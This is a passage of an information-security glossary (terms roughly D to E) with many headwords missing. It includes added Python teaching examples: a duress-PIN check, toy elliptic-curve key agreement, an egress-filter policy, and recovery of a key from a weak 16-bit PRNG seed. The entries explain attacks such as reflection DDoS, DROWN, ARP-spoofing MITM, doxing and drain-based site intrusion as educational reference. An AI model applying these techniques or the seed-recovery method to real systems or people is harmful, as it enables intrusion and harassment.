Form or component of malware which downloads additional code (usually the payload) from the Internet.  This arrangement allows criminals to change the malware dynamically, for example to evade antivirus software, attack specific new targets or extend previous attacks.  See also fileless malware.


“Handling processes and movements of products and services that occur after an entity in the supply chain takes custody of the products and responsibility for services” (ISO/IEC 27036-1).

Dox, DoX,
doxing, DoXing

Leet terms derived from “docs” (documents), referring to the process of illicitly gathering and perhaps disclosing personal information on targets by researching their presence on social media and other sources such as hacked personnel databases.  Has harassing, bullying or threatening overtones of coercion, similar to stalking, grooming, snooping, spying and other forms of social engineering.

DoXware, doxware

See leakware.


See data processing.


See disaster recovery.


See SAE.


The ‘urban sport’ of exploring insecure drains, service ducts and other voids as a means of bypassing physical perimeter controls in order to gain unauthorized access to sites and buildings.  A risky, dangerous form of trespass and a significant though underappreciated risk for many otherwise secure places.

(Distributed Reflective
Denial of Service)

Some DDoS attacks use UDP rather than TCP.  The attacker sends small requests, with the source IP address spoofed to that of the victim, to open UDP services (such as DNS servers), which send their much larger responses to the victim rather than back to the originator, both amplifying the volume of traffic and hiding its true source.  It is nothing to do with DR-DOS, a PC operating system from Digital Research.


A multifunctional evolving antivirus-evading malware with botnet, bank Trojan and ransomware capabilities.  The FBI tried to disrupt the Dridex infrastructure by blackholing C2 traffic in 2016 but it remained active in the wild in 2019.  In December 2019, two alleged Russian members of Evil Corp (the cybercriminal gang behind Dridex), were indicted for their part in stealing ~$70m from organisations around the globe.

Drive-by download,
Web-inject malware

Mode of malware infection involving the user merely browsing to an infectious website where vulnerabilities in the browser software are silently exploited, usually without the user even being aware of the compromise.

Driver pins

In most physical locks, these standard-length metal cylinders are pushed back against springs into the hull by the variable-length key pins when a key is inserted into the keyway.  Provided the key pins and driver pins meet along a straight shear line due to the correct key having been inserted, the plug can be rotated at the shear line to open or close the lock.

(Digital Rights Management or Digital Restriction Measures)

Cryptographically-based access controls used to permit or deny certain types of use of intellectual property according to the owner’s wishes, potentially exceeding the constraints available under copyright law (e.g. fair use can be prevented through technical means).

(Unmanned Aerial Vehicle)

Unmanned aircraft, normally used for remote surveillance.  Basic drones (toys) are controlled by human operators nearby, while sophisticated military versions (UAVs) may operate semi-autonomously using GPS and intelligent control systems to complete surveillance or attack missions across immense distances.  Raises safety and privacy concerns.

dead drop,
Dead Letter Box

Physical or electronic location where messages, parcels, files etc. may be safely (anonymously, secretly and asynchronously) delivered to a collector, competitor, spy or criminal hacker/cracker.  Modern day spies may use anonymous Internet services, encryption, steganography and covert channels to pass information but still rely on dead drops to pass physical assets such as One Time Pads, goods purchased with stolen credit card numbers, and good ol’ fashioned cash.  See also live drop.


Malware which delivers/contains, unpacks and installs other malware on an infected system.  See also downloader.

(Decrypting RSA with Obsolete and Weakened eNcryption)

Contrived name for an attack that decrypts TLS sessions by exploiting the deprecated SSL v2 protocol: a server that still accepts SSLv2 connections (or any other server sharing the same RSA key) acts as a Bleichenbacher padding oracle, letting the attacker recover the session keys of previously captured TLS connections.  The RSA private key itself is not disclosed; the remedy is to disable SSLv2 everywhere the key is used.  See also POODLE and Heartbleed.

(Defend Trade Secrets Act)

US federal law that provides some legal protection for confidential proprietary information classed as trade secrets, supplementing state laws and harmonizing the approach.


Form of control requiring the actions of more than one person, for example when two soldiers have to insert and turn their keys at the same moment into locks placed several meters apart in order to launch a missile.

Dual stack device

“A product that implements both IP version 4 and 6 protocol stacks” (NZ information Security Manual).


Technology that can be used for both offensive and defensive security purposes, to wage war and to secure peace.  Strong encryption, for instance, protects information and communications regardless of the nature of the information and the communicating parties: it is valued and used by criminals, terrorists, the authorities including governments, militia and law enforcement, and the public alike.

Due care

Obligation or expectation that fiduciary officers/executives of an organisation duly protect its assets and act in its best interests, just as a prudent person would be expected to do. “The responsibility that managers and their organisations have a duty to provide for information security to ensure that the type of control, the cost of control, and the deployment of control are appropriate for the system being managed” (NIST SP 800-30).  See also negligence.  Cf. due diligence and duty of care.

Due diligence

Assurance activities in preparation for important corporate activities such as mergers, acquisitions and the execution of major contracts.  Also compliance e.g. enforcing policies and ensuring that security controls are effectively protecting valuable information assets.  Cf. due care and duty of care.


Data file containing authentication credentials such as usernames and passwords or credit/bank card numbers and related information such as the cardholder’s name and the CVV, possibly fullz, stolen by a hacker or carder then made available on the hacker underground.


APT worm similar to and perhaps derived from Stuxnet.

Duress alarm,
duress button

Type of silent alarm that can be triggered by a worker to signal that they are experiencing some form of duress (coercion, threat, hold-up, robbery etc.), typically by hitting a concealed ‘panic button’, releasing a dead man’s handle or entering a particular combination of keys (such as their normal password or PIN code immediately preceded or followed by, say, the hash symbol) into a system that has been specifically designed and configured to incorporate this facility (such as a bank teller’s workstation or security guard station).  The duress variant must still grant the normal access, so that the coercer notices nothing unusual while the alarm is raised remotely.
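The keypad variant of the duress code, as an added example that is not part of the glossary.  The convention assumed here is that the user’s normal PIN followed by ‘#’ is the duress code; the comparison is constant-time, the duress entry still authenticates so the coercer sees a normal login, a silent alarm record is written, and a bare ‘#’ or a marker on a wrong PIN does not authenticate.  The terminal names and the in-memory alarm log are constructed stand-ins for a real alarm channel.

```python
"""Duress-PIN check for a keypad or teller workstation: added example, not from the glossary.

Convention (an assumption): the user's normal PIN with '#' appended is the
duress code.  It must still authenticate, so the coercer sees nothing
unusual, while a silent alarm event is raised.  A bare '#' or a marker on
a wrong PIN must not authenticate.
"""
import hmac
from typing import Dict, List, Tuple

DURESS_MARKER = "#"
ALARM_LOG: List[Dict[str, str]] = []   # stands in for the silent/remote alarm channel


def check_pin(entered: str, stored_pin: str, terminal: str) -> Tuple[bool, bool]:
    """Return (authenticated, duress).  Never reveal the duress state to the keypad."""
    candidate, duress = entered, False
    if entered.endswith(DURESS_MARKER) and len(entered) > len(DURESS_MARKER):
        candidate, duress = entered[:-len(DURESS_MARKER)], True
    # constant-time comparison of the PIN proper (marker already stripped)
    ok = hmac.compare_digest(candidate.encode(), stored_pin.encode())
    if ok and duress:
        ALARM_LOG.append({"terminal": terminal, "event": "duress"})  # silent: no local indication
    return ok, ok and duress


if __name__ == "__main__":
    for attempt in ("2468", "2468#", "1111#", "#"):
        authenticated, _ = check_pin(attempt, "2468", "teller-3")
        print(f"{attempt!r:8} -> access {'granted' if authenticated else 'denied'}")
    print("alarm channel:", ALARM_LOG)
```

In a real deployment the stored PIN would be a salted hash rather than cleartext, and the alarm record would go to the guard house or monitoring centre, never to the terminal display.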

Duty of care

A responsibility, obligation, duty, requirement or expectation to ensure that others are not harmed by one’s action or inaction.  Cf. due care, due diligence.


A bank Trojan capable of man-in-the-middle attacks, monitoring online banking sessions to capture browser snapshots and logon credentials.  Discovered in 2014.

(Evaluation Assurance Level)

An assurance metric indicating the depth and rigor to which secure ICT products are evaluated against the Common Criteria.  EAL 1 is the simplest, most basic level, EAL 7 the most advanced.  “Set of assurance requirements that represent a point on the Common Criteria predefined assurance scale” (CNSSI-4009).  “A level of assurance in the security functionality of a product gained from undertaking a Common Criteria evaluation.  Each EAL comprises a number of assurance components, covering aspects of a product’s design, development and operation” (NZ information Security Manual).

(Enterprise Asset Management)

Structured and often software-assisted processes to manage corporate assets (generally just physical assets such as buildings, machinery/plant, vehicles and infrastructure) from acquisition to disposal, including preventive maintenance and repair activities.

(Emergency Action Plan)

A plan to help people survive life-threatening emergency situations or crises such as active shooters, holdups, attacks by terrorists or criminal gangs, bomb threats or blasts, or natural disasters.  Such events may occur suddenly without warning, hence the EAP and associated exercises aim to help by preparing people for the possibility and practicing their responses (e.g. evacuate, hide or defend yourself).

Easter egg

A Trojan horse function hidden within an otherwise legitimate program.  Although normally benign (such as a simple computer game or audio-visual tribute to the programmers), the fact that a covert function has been coded and passed through program testing hints at a possible governance issue with the SDLC, begging the question “What else might be going on in there?”.  “Hidden functionality within an application program, which becomes activated when an undocumented, and often convoluted, set of commands and keystrokes are entered. Easter eggs are typically used to display the credits for the development team and are intended to be nonthreatening” (NIST SP 800-28).


To listen-in or snoop on someone or something covertly.  May involve literally listening and watching from nearby, or remotely using surveillance equipment such as binoculars, bugs, cameras, spyware, keyloggers and backdoors, network analysers, passive reflectors modulating infrared laser beams, wiretaps etc., with obvious privacy implications.

(Elliptic Curve Cryptography)

Form of public key cryptography whose security rests on the difficulty of the discrete logarithm problem in the group of points on an elliptic curve over a finite field: a private key is a large integer d, and the corresponding public key is the point dG obtained by repeatedly adding a fixed generator point G.  It provides security comparable to RSA with far shorter keys (a 256-bit curve roughly matches 3072-bit RSA) and underlies ECDH key agreement and ECDSA/EdDSA signatures.
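The key-pair construction and ECDH key agreement on a toy curve, as an added example that is not part of the glossary.  The curve y² = x³ + 2x + 2 over GF(17) with generator (5, 1) is a textbook curve whose point group has prime order 19, chosen so that every step can be checked by hand; the brute-force routine at the end recovers a private key in at most 18 multiplications, which is exactly why real curves use fields of around 256 bits.  This is a teaching implementation, not a substitute for a vetted library.

```python
"""Elliptic-curve key pairs and ECDH on a toy curve: added example, not from the glossary.

Curve y^2 = x^3 + 2x + 2 over GF(17) with generator G = (5, 1), a textbook
curve whose group has prime order 19.  Real curves (P-256, Curve25519) use
~256-bit fields; the brute-force function at the end shows why the group
order must be huge.  Not for production use.
"""
import random
from typing import Optional, Tuple

P, A, B = 17, 2, 2                   # field prime and curve coefficients
G = (5, 1)                           # generator point
Point = Optional[Tuple[int, int]]    # None is the point at infinity


def on_curve(pt: Point) -> bool:
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x ** 3 + A * x + B)) % P == 0


def add(p: Point, q: Point) -> Point:
    """Group law: chord-and-tangent addition using modular inverses."""
    if p is None:
        return q
    if q is None:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                   # P + (-P) = infinity
    if p == q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P)  # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P)         # chord slope
    lam %= P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def mul(k: int, pt: Point) -> Point:
    """Scalar multiplication by double-and-add: easy forwards, hard to invert."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = add(result, addend)
        addend = add(addend, addend)
        k >>= 1
    return result


def point_order(pt: Point) -> int:
    n, acc = 1, pt
    while acc is not None:
        acc = add(acc, pt)
        n += 1
    return n


def keypair(rng: random.Random) -> Tuple[int, Point]:
    d = rng.randrange(1, point_order(G))      # private scalar
    return d, mul(d, G)                       # public point Q = dG


def ecdh(seed: int = 1) -> Tuple[Point, Point]:
    """Each side combines its private scalar with the other's public point."""
    rng = random.Random(seed)                 # fixed seed only for reproducibility
    d_a, q_a = keypair(rng)
    d_b, q_b = keypair(rng)
    return mul(d_a, q_b), mul(d_b, q_a)       # both equal d_a * d_b * G


def brute_force_private(pub: Point) -> Optional[int]:
    """Feasible only because the order is 19; infeasible on a real curve."""
    for d in range(1, point_order(G)):
        if mul(d, G) == pub:
            return d
    return None


if __name__ == "__main__":
    print("2G =", add(G, G), " order of G =", point_order(G))
    print("shared secrets agree:", ecdh()[0] == ecdh()[1])
    print("private key for 7G recovered as", brute_force_private(mul(7, G)))
```

The shared point from `ecdh` would normally be fed through a key-derivation function rather than used directly, and production code must also reject public points that are not on the curve before multiplying by them.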

(Electronic Counter-CounterMeasures),
(EleCtronic Protective measures)

Defensive techniques to avoid electronic communications or systems being compromised by an adversary – or indeed by friendly forces – using ECM, for example using spread-spectrum, burst, covert and/or spoof transmissions, and TEMPEST.


NSA-led global mass surveillance program launched in the 1960s in conjunction with what became the Five Eyes.  France has a similar program dubbed ‘Frenchelon’ with satellite ground stations (‘spy stations’) located in mainland France and some of its overseas territories.

(Electronic CounterMeasures)

Offensive techniques to disrupt an adversary’s electronic communications or systems, for instance by jamming their radio links, transmitting false beacons or misleading their automated target-acquisition systems.  The electronic equivalent of chaff (metallic strips dispensed in large numbers by a moving vehicle to confuse radar systems).  See also ECCM.

Economic espionage

Euphemism for state-sponsored industrial espionage (surveillance, spying) directed against foreign corporations and (usually) their intellectual assets.


Activist or extremist who may sabotage organisations they believe to be exploiting and wantonly harming the natural environment through their operations (e.g. mining and oil companies destroying the rain forests, or ‘scientific’ whaling).

[Information security] Education

General knowledge and expertise in relation to recognizing and minimizing information risks through appropriate security controls.  Achieved initially through the school/education system, advice from parents and teachers etc. and then extended through security training and awareness activities during employment, supplementing work and general life experience.  [In general] “Process of receiving or giving systematic instruction, especially at a school or university” (ISO/IEC 19896-1:2018).


Measure of the quality or suitability of something for some purpose.  “Extent to which planned activities are realized and planned results achieved” (ISO/IEC 27000).  “Ability to apply knowledge and skills in a productive manner, characterized by attributes of behaviour such as aptitude, initiative, enthusiasm, willingness, communication skills, team participation, and leadership” (ISO/IEC 19896-1:2018).


Measure of the consumption of resources by something.  “Relationship between the results achieved and resources used” (ISO 9000).

Egress filtering

Blocking of traffic as it exits a network, for example to prevent malware-infected or hacked computers on corporate networks from sending spam or attacking systems on external networks, or to block highly classified information from passing onto an unclassified network.  Cf. ingress filtering.
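An egress policy applied to outbound flow records, as an added example that is not part of the glossary.  The policy is an assumption made for the example: only the mail relay may open TCP/25 to the Internet, only the internal resolver may send DNS out, web ports are allowed from anywhere inside, and every other flow leaving the network is denied.  The two denials it produces are exactly the cases the entry describes (a spambot sending mail directly, and a host bypassing the corporate resolver, which is how DNS tunnelling and much C&C traffic leaves).  Addresses and flows are constructed.

```python
"""Egress policy check over outbound flow records: added example, not from the glossary.

Policy (an assumption for the example): only the mail relay may open TCP/25
to the Internet, only the internal resolver may send DNS out, web traffic
is allowed, and everything else leaving the network is denied.  Addresses
and flow records are constructed.
"""
from ipaddress import ip_address, ip_network
from typing import List, NamedTuple, Tuple

INTERNAL = ip_network("10.0.0.0/8")
MAIL_RELAY = ip_address("10.0.1.25")
RESOLVER = ip_address("10.0.1.53")
WEB_PORTS = {80, 443}


class Flow(NamedTuple):
    src: str
    dst: str
    proto: str
    dport: int


def egress_decision(f: Flow) -> Tuple[str, str]:
    src, dst = ip_address(f.src), ip_address(f.dst)
    if src not in INTERNAL or dst in INTERNAL:
        return "n/a", "not an egress flow"
    if f.proto == "tcp" and f.dport == 25:
        if src == MAIL_RELAY:
            return "allow", "mail relay"
        return "deny", "direct outbound SMTP from a workstation: probable spambot"
    if f.proto in ("udp", "tcp") and f.dport == 53:
        if src == RESOLVER:
            return "allow", "internal resolver"
        return "deny", "DNS bypassing the internal resolver: possible tunnelling or C&C"
    if f.proto == "tcp" and f.dport in WEB_PORTS:
        return "allow", "web"
    return "deny", "not on the egress allow-list"     # default deny


SAMPLE_FLOWS = [                                      # constructed sample
    Flow("10.0.1.25", "198.51.100.10", "tcp", 25),
    Flow("10.0.7.42", "198.51.100.10", "tcp", 25),
    Flow("10.0.1.53", "198.51.100.53", "udp", 53),
    Flow("10.0.7.42", "198.51.100.53", "udp", 53),
    Flow("10.0.7.42", "198.51.100.80", "tcp", 443),
    Flow("10.0.7.42", "198.51.100.99", "tcp", 4444),
    Flow("10.0.7.42", "10.0.1.53", "udp", 53),        # internal, not egress
]


def denied(flows: List[Flow]) -> List[Tuple[Flow, str]]:
    hits = []
    for f in flows:
        verdict, reason = egress_decision(f)
        if verdict == "deny":
            hits.append((f, reason))
    return hits


if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f"{f.src:>10} -> {f.dst:<15} {f.proto}/{f.dport:<5} {egress_decision(f)}")
```

The same logic expressed as firewall rules is a default-deny outbound chain with three explicit accepts; the value of evaluating it over flow logs first is that it shows which existing traffic the rules would break before they are enforced.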


Covert US government network security monitoring/intrusion detection capability originally developed by US-CERT and deployed in 2004.  The current incarnation, EINSTEIN 3, is being developed by the NSA.  It reportedly monitors traffic flowing through authorized gateways between the internal government network/s and the outside world, while a cloud-based distributed sensor version is (also) under consideration, presumably to counter threats arising from the Internet of Things and proliferating Internet connectivity.

Electronic archive

A long-term data store (see archive).  “Long-term repository of Electronically Stored Information.  Notes: Electronic archives can be on-line, and therefore accessible, or off-line and not easily accessible.  Backup systems (e.g., tape, virtual tape, etc.) are not intended to be electronic archives, but rather data protection systems (i.e., recovery mechanisms for disaster recovery and business continuity).” (ISO/IEC 27050-1).

Electronic discovery,

Discovery that includes the identification, preservation, collection, processing, review, analysis, or production of Electronically Stored Information.  Note: Although electronic discovery is often considered a legal process, its use is not limited to the legal domain.” (ISO/IEC 27050-1).

Elevation or escalation [of privileges]

A multi-stage attack (on a castle, building, system, application, person, organisation etc.) in which an outsider (e.g. an intruder, hacker or malware) first gains entry or a foothold innocuously through an inadequately secured entry-point to a general access level, then exploits internal vulnerabilities to gain further access to and compromise assets that are not directly accessible from outside.  Hackers commonly gain unprivileged access to target systems first (e.g. by registering as a basic user with limited rights), then use commands (often scripted in the form of malware) to exploit technical vulnerabilities, gain privileged or unrestricted access and hence pwn the systems.


Social engineering technique whereby, during an apparently innocuous conversation, someone is surreptitiously probed for additional information.  For example, the question “Was John there with Alan?” might prompt the answer “No, John wasn’t there”.  The respondent’s lack of reference to Alan implies that he was there, hinting at what may have been the true purpose of the question.

(ELectronic INTelligence)

Gleaning useful information from the characteristics of electronic signals, aside from any intended communications content, using electronic sensors.  Spectrum analysis and direction-finding techniques, for instance, can be used to characterize and perhaps identify a specific source of radiated electronic signals (not necessarily a radio transmitter as such).  Part of SIGINT.

Electronic Warfare

See cyberwar.

(Electronic mail)

Popular communications mechanism that originally used private commercial networks (such as AOL, CompuServe and internal corporate networks) then transitioned to the Internet in the 1990s.  Emails are sent and received asynchronously, meaning they wait in the recipient’s mailbox until being opened and read, as opposed to real-time and near-real-time online chat systems such as IM.  Vulnerable to numerous information security threats and incidents such as malware, spam, 419s and other frauds, coercion, social engineering, unpredictable delays and occasional non-delivery or mis-delivery of messages, interception or inappropriate and unauthorized disclosure of confidential information, hacking of email servers/systems, spoofing of email headers and message content etc.

Email bomb,
spam bomb

Attempt to fill or overload a victim’s email system by sending huge quantities of spam to it e.g. by deliberately disclosing their email address to known spammers and high-volume mailing lists, causing frustration, cyber harassment and denial of service.

Emanation security

“The counter-measure employed to reduce classified emanations from a facility and its systems to an acceptable level. Emanations can be in the form of RF energy, sound waves or optical signals” (NZ information Security Manual).

  See also TEMPEST and SCIF.

Embedded malware

Malware (such as APTs) hidden so deeply within a system (possibly in the hardware, microcode, firmware, device drivers or operating system kernel) that only competent forensic analysis (possibly involving access to the source code, compilers and specialist tools) may reveal its presence.

Embedded system

Usually a physically small computer system or subsystem, perhaps a thing, encased entirely within a piece of electrical, electronic or mechanical equipment (such as a computerized item of industrial plant or an ICS) and used to monitor and control that equipment.  Often based on a pared-down version of the Linux operating system or a real-time operating system, designed to perform specific functions very efficiently, as opposed to multipurpose computers.  May interface to a SCADA system or the Internet of Things.


Theft of assets entrusted to a fraudster by the victim e.g. deposits stolen by a dishonest fund manager.  See also malfeasance.

Emergency access

Route in to an access-controlled site, building, room, system etc. for use in emergency conditions.  “The process of a system user accessing a system that they do not hold appropriate security clearances for due to an immediate and critical emergency requirement” (NZ information Security Manual).

  See also emergency intervention.

Emergency intervention

Situation in which a competent support person is specifically authorized by management to modify a system directly, typically through a privileged emergency user ID, bypassing or overriding the normal system access controls and code migration processes in order to diagnose and resolve an urgent production issue.

Emergency situation

“A situation requiring the evacuation of a site.  Examples include fires and bomb threats” (NZ information Security Manual).


Multifunctional malware that has evolved from a bank Trojan in 2014 to a loader for various forms of malware today.  In the wild in 2019.

EMP (Electro-Magnetic Pulse) weapon,
HERF (High Energy Radio Frequency) gun

Most electrical and electronic devices are inherently highly vulnerable to extremely strong electromagnetic fields and high voltages (such as those produced by nearby lightning strikes, nuclear explosions or, at close range, Taser-type devices), and/or to the accompanying power surges, unless they are sufficiently well designed, engineered, shielded and protected to be resilient.  EMP-based cyberweapons (missiles, bombs, hand-deployed devices etc.) are intended for cybertage, cyberwar or cyberterrorism, perhaps physically damaging critical parts of the enemy’s cyberinfrastructure, for example CHAMP.

(Enterprise Mobile Security, Enterprise Mobility Suite)

See MDM.

(EMissions SECurity)

Securing systems against compromising emanations e.g. using TEMPEST and Faraday cages. “The protection resulting from all measures taken to deny unauthorized persons information of value that might be derived from communications systems and cryptographic equipment intercepts and the interception and analysis of compromising emanations from cryptographic equipment, information systems, and telecommunications systems.” (Air Force Air Intelligence, Surveillance and Reconnaissance Agency instruction 33-203, 2011)

Encapsulating security payload

Network security protocol, part of IPsec. “A protocol used for encryption and authentication within IPSec” (NZ information Security Manual).


The first widely-accepted digital forensics tool-suite, used to examine (acquire, analyse and report on) digital evidence.  A commercial product, now from OpenText.


“Collection of information systems connected by one or more internal networks under the control of a single authority and security policy. The systems may be structured by physical proximity or by function, independent of location.” (CNSSI-4009).

Enclave boundary

“Point at which an enclave’s internal network service layer connects to an external network’s service layer, i.e., to another enclave or to a Wide Area Network (WAN)” (CNSSI-4009).


Application of cryptography to maintain the confidentiality of information by preventing anyone without the correct decryption key/s gaining access to or surmising the plaintext content.

End user,

Term used by snooty ICT professionals to refer (often dismissively or disparagingly) to the people who use IT systems, networks, devices, services etc.

End User Computing

The practice of software development, implementation and/or support by citizen programmers.


The use of sanctions to discourage and penalize noncompliance or non-fulfilment of one or more obligations, expectations etc.  Has distinctly negative, demotivational connotations, as opposed to reinforcement.

(Electronic Numerical Integrator And Computer)

The first Turing-complete (general purpose) electronic computer.  Designed at the University of Pennsylvania by Mauchly and Eckert, ENIAC was delivered to the US Army in 1946 to calculate ballistics tables.  It used 17,500 electronic valves (vacuum tubes) and 1,500 relays, weighed 30 tons and consumed 150kW.  It was programmed mechanically over several days using patch leads and switches.  50 years on, ENIAC was replicated as a single integrated circuit approximately 3½ cm square, similar to a Pentium CPU chip.  See also Colossus.


Process whereby, for example, the physical characteristics of people whose identities have been authenticated by some other means are measured by and registered on biometric security devices, thus associating biometric characteristics with user IDs.


“A natural or legal person engaged in an economic activity, irrespective of its legal form, including partnerships or associations regularly engaged in an economic activity” (GDPR).

Enterprise Risk Management (ERM)

High level corporate governance activity for systematically identifying, assessing, treating and monitoring/tracking risks that are significant to the enterprise or organisation as a whole (sometimes known as ‘bet the farm’ risks), involving aspects such as business/commerce, strategy, politics, health-and-safety, finance, currency, products, markets, environment, people, compliance, technology, information, infrastructure etc.


Inducing or permitting someone to commit a crime that they would have committed anyway (e.g. the police using closely-monitored ‘bait cars’ to entice vehicle thieves) then prosecuting them for so doing.  Cf. entrapment.


Inducing someone to commit a crime they would not otherwise have committed.  Prosecution is likely to fail if the court accepts this as a legitimate defence.  Cf. enticement.  “Deliberate planting of apparent flaws in an information system for the purpose of detecting attempted penetrations” (CNSSI-4009).


A measure of randomness or unpredictability.  High entropy in encryption keys is vital to prevent cryptanalysts guessing the keys by brute force, while high entropy in the cyphertext reduces the chance of revealing useful information through discernible patterns.  Keys produced by a pseudo-random number generator can contain no more entropy than the seed that initialised it, however random the output looks statistically: a 128-bit key derived from a 32-bit seed is effectively a 32-bit key.  Cryptographic keys should therefore come from a cryptographically secure random number generator seeded from genuinely unpredictable sources, such as the operating system’s entropy pool.
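The distinction between statistical and real entropy, as an added example that is not part of the glossary.  A 16-byte key drawn from Python’s non-cryptographic `random.Random` seeded with a 16-bit value scores about the same Shannon entropy as one from `os.urandom`, yet the seed space is small enough to search in a second, recovering the whole key.  The 16-bit seed width is a constructed weakness for the demonstration; the point generalises to any PRNG seeded with less entropy than the key length.

```python
"""Statistical entropy versus unpredictability of keys: added example, not from the glossary.

Shannon entropy estimates the randomness of a byte string from its symbol
frequencies.  A 16-byte key from a non-cryptographic PRNG seeded with only
16 bits looks just as random by that measure as one from os.urandom, yet
it has at most 16 bits of real entropy: the seed space is small enough to
search.  The seed width is a constructed weakness for the demonstration.
"""
import math
import os
import random
from collections import Counter
from typing import Optional


def shannon_entropy(data: bytes) -> float:
    """Bits per byte estimated from byte frequencies (maximum 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def weak_key(seed: int, nbytes: int = 16) -> bytes:
    """Key from random.Random (Mersenne Twister) seeded with a 16-bit value."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(nbytes))


def strong_key(nbytes: int = 16) -> bytes:
    return os.urandom(nbytes)                  # operating-system CSPRNG


def recover_seed(key: bytes, seed_bits: int = 16) -> Optional[int]:
    """Brute-force the seed: 2**16 candidates is trivial work for an attacker."""
    for seed in range(1 << seed_bits):
        if weak_key(seed, len(key)) == key:
            return seed
    return None


def compare() -> dict:
    """Both keys look alike statistically; only one can be recovered."""
    weak, strong = weak_key(0x2A5C), strong_key()
    return {
        "weak_entropy": shannon_entropy(weak),
        "strong_entropy": shannon_entropy(strong),
        "recovered_seed": recover_seed(weak),
        "strong_seed": recover_seed(strong),   # None: no 16-bit seed reproduces it
    }


if __name__ == "__main__":
    for k, v in compare().items():
        print(f"{k:15} {v}")
```

The per-byte figure for a 16-byte key can never exceed 4 bits (there are at most 16 distinct symbols), which is a reminder that frequency-based entropy estimates of short strings say little about key quality; what matters is the entropy of the source.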

(Electronic Privacy
Information Center)

Privacy advocacy and activist group, describing itself as a “public interest research center in Washington, DC”.  EPIC website.


Secret US surveillance system allegedly developed by Ed Snowden according to Oliver Stone’s biographical film Snowden.

Equation Group

Hacker group allegedly associated with the NSA.


Mistake, accident, unintended discrepancy etc.  A breakdown or failure of integrity.  Although errors cause a far greater number of information security incidents than deliberate attacks, the effects are usually relatively minor.  Furthermore, errors are often noticed and corrected by the people, systems or devices that caused them, with next to no consequential impact.  Rarely, however, unnoticed/uncorrected errors (such as software bugs and the inappropriate use of statistics) can have extremely serious or grave consequences such as corrupting business- or safety-critical data or leading to bad decisions.


In virtualisation, a breakout from a guest system into the hypervisor, host operating system or another guest, typically by exploiting a vulnerability in the hypervisor or its emulated devices.  Allows hacking and data leakage between virtual systems, or access from a sandbox to the host.


“A person who ensures that when maintenance or repairs are undertaken to IT equipment that uncleared personnel are not exposed to information” (NZ information Security Manual).


The safekeeping or custodianship of an asset by a trusted person or organisation (the ‘escrow agent’), enabling its release to one or more third parties if certain conditions (usually specified formally in a contract) are met.  Examples include key escrow and source code escrow.  The control hinges on the trustworthiness and competence of the agent.

Escrow fraud

Type of fraud in which an escrow agent betrays the trust placed in them by the owner of assets placed in their care, normally embezzling the assets.

(Electronically Stored Information)

Data.  “Data or information of any kind and from any source, whose temporal existence is evidenced by being stored in or on any electronic medium.  Notes: ESI includes traditional e-mail, memos, letters, spreadsheets, databases, office documents, presentations and other electronic formats commonly found on a computer. ESI also includes system, application and file-associated metadata such as timestamps, revision history, file type, etc.  Electronic medium can take the form of, but is not limited to, storage devices and storage elements.” (ISO/IEC 27040).

ESI analysis

Forensic examination/study of ESI.  “Element of an electronic discovery process focused on evaluating Electronically Stored Information for content and context to identify facts, relationships, key patterns, and other features that can lead to improved understanding of an ESI corpus.  Note: Content and context can include key patterns, topics, people and discussions.” (ISO/IEC 27050-1).

ESI collection

Seizure or collection of ESI, usually from a crime scene.  “Element of an electronic discovery process focused on gathering Electronically Stored Information and other related material” (ISO/IEC 27050-1).

ESI identification

“Element of an electronic discovery process focused on locating potential sources and the criteria for selecting potentially relevant Electronically Stored Information” (ISO/IEC 27050-1).

ESI preservation

“Element of an electronic discovery process focused on ensuring that Electronically Stored Information is protected against inappropriate alteration or destruction.  Note: In some matters or jurisdictions, there can be requirements to prevent spoliation of Electronically Stored Information” (ISO/IEC 27050-1).

ESI processing

Extraction of ESI from storage media etc.  “Element of an electronic discovery process focused on extracting Electronically Stored Information and converting it, if necessary, to forms more suitable for ESI review and ESI analysis” (ISO/IEC 27050-1).

ESI production

Providing, revealing or presenting ESI e.g. in court. “Element of an electronic discovery process focused on delivering or making available Electronically Stored Information.  Notes: ESI production can also include getting Electronically Stored Information in appropriate forms and using appropriate delivery mechanisms. ESI production can be to any person or organisation” (ISO/IEC 27050-1).

ESI review

“Element of an electronic discovery process focused on screening Electronically Stored Information based on specific criteria.  Note: In some matters or jurisdictions, Electronically Stored Information that is considered privileged can be excluded from production” (ISO/IEC 27050-1).


See spying.

Essential communications

“Communications whose contents are necessary for the prevention of or relief from disasters and for the maintenance of public order in adverse conditions” (ISO/IEC 27011).


NSA hacking tool exploiting a previously undisclosed vulnerability in Windows SMBv1 (Server Message Block).  Microsoft, notified by the NSA, issued a critical patch (MS17-010) in March 2017, about a month before the hacker group Shadow Brokers published this and other NSA tools in April 2017.  Networked systems that were not patched in time (including old Windows versions no longer fully supported) were hit by the WannaCry and NotPetya ransomware outbreaks later that year, both of which used EternalBlue to spread.


See Wireshark.

Ethics, ethical

Behaviour broadly accepted as appropriate, right and proper, at least within the culture or organisation in which it occurs.  Ethical beliefs and standards vary, however.  A practice considered ethical within the hacker underground, for example, may be entirely unacceptable and inappropriate (unethical) to society at large including information security and law enforcement professionals.

Ethical dilemma

Situation in which ethical constraints, objectives, rules, laws, regulations, directives etc. come into conflict, requiring a worker either to make a difficult personal decision regarding how to resolve the dilemma and achieve the most beneficial or least damaging net outcome, or to seek further guidance from management, trustworthy colleagues etc.

Ethical hacking

Hacking or penetration testing of ICT networks and systems etc. by white hats that is explicitly sanctioned, authorized, permitted or commissioned by their owners for the purpose of identifying and demonstrating security vulnerabilities so that they can be fixed before malicious hackers exploit them.  Normally covered by an explicit contract defining the scope, nature of tests permitted and forbidden, constraints, confidentiality of the results etc.; without such authorisation the very same activities would be criminal.


Hacking/penetration testing tool capable of mounting MITM attacks on LAN traffic, for instance by ARP spoofing to divert a victim’s traffic through the attacker’s machine where it can be sniffed or modified.

European Data Protection Board

European Union body tasked with supervising and coordinating data protection (privacy) arrangements under GDPR across Europe, for instance liaising with and guiding national privacy ombudsmen or supervisory authorities.

(Extended Validation)

